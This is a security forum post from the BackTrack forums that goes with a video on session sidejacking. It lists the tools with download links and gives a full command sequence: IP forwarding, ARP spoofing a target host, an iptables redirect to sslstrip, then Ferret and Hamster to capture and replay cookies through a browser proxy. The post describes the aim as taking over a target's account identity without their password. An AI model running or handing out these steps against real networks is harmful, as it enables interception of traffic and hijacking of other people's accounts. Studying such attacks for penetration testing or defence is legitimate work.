Results 1 to 10 of 16

Thread: [Video] Session Sidejacking (Ferret and Hamster)

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default [Video] Session Sidejacking (Ferret and Hamster)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
    Download video: http://www.mediafire.com/?3pz9w85jd4s328q
    What is this?
    This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!


    What do I need?

    > arpspoof
    > sslstrip
    > Hamster (and Ferret)
    *all in BackTrack 4 Final*


    Software
    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: sslstrip
    Version: 0.6
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

    Name: Hamster Sidejacking Tool
    Version: 2.0
    Home Page: http://hamster.erratasec.com/
    Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z


    Commands:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -p -k -f
    
    /pentest/sniffers/hamster/ferret -i eth0
    
    /pentest/sniffers/hamster/hamster
    
    Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
    Konqueror -> http://hamster
    Notes:
    Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
    Video length: 2:39
    Capture length: 3:42

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html
    Last edited by g0tmi1k; 03-05-2011 at 03:03 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM
  4. framework 3 [...] no session
    By icebox19 in forum Beginners Forum
    Replies: 3
    Last Post: 02-08-2010, 02:41 PM
  5. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •